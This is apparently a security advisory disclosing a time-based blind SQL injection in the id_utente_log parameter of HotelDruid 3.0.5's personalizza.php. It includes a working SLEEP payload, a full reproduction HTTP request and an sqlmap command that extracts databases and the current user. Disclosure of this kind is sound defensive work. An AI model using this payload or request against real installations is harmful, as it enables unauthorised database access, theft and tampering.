Affected Version: hoteldruid version 3.0.5
Security Issue:
SQL injection via POST parameter id_utente_log
URL: <http://localhost/hoteldruid/personalizza.php>
Method: POST
Vulnerable Parameter: id_utente_log
Payload: 0'%2b(SELECT%207151%20FROM%20(SELECT(SLEEP(5)))EAXh)%2b'
Vulnerability Description:
SQL injection (SQLi) refers to an injection attack wherein an attacker can execute malicious SQL statements that control a web application's database server.
Process to reproduce:
1. Copy the HTTP Request below
2. Save the file as sqli_2.txt
3. Run the sqlmap command below to see the extracted data from the database
HTTP Request:
POST /hoteldruid/personalizza.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: <http://localhost/hoteldruid/>
Content-Length: 154
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive
aggiorna_qualcosa=SI&anno=2023&attiva_phpr_log=Enable&id_sessione=1&id_utente_log=0'%2b(SELECT%207151%20FROM%20(SELECT(SLEEP(5)))EAXh)%2b'&id_utente_mod=1
HTTP Response:
Proof of Exploit:
SQL query - SELECT database()
hoteldruid
Screenshot:
Command used: sqlmap -r sqli_2.txt -p id_utente_log --risk 3 --level 5 --dbs --current-user --current-db
The impact of this vulnerability:
An attacker can use SQL injection to bypass a web application's authentication and authorization mechanisms and retrieve the contents of an entire database. SQLi can also be used to add, modify and delete records in a database, affecting data integrity. Under the right circumstances, SQLi can also be used by an attacker to execute OS commands, which may then be used to escalate an attack even further.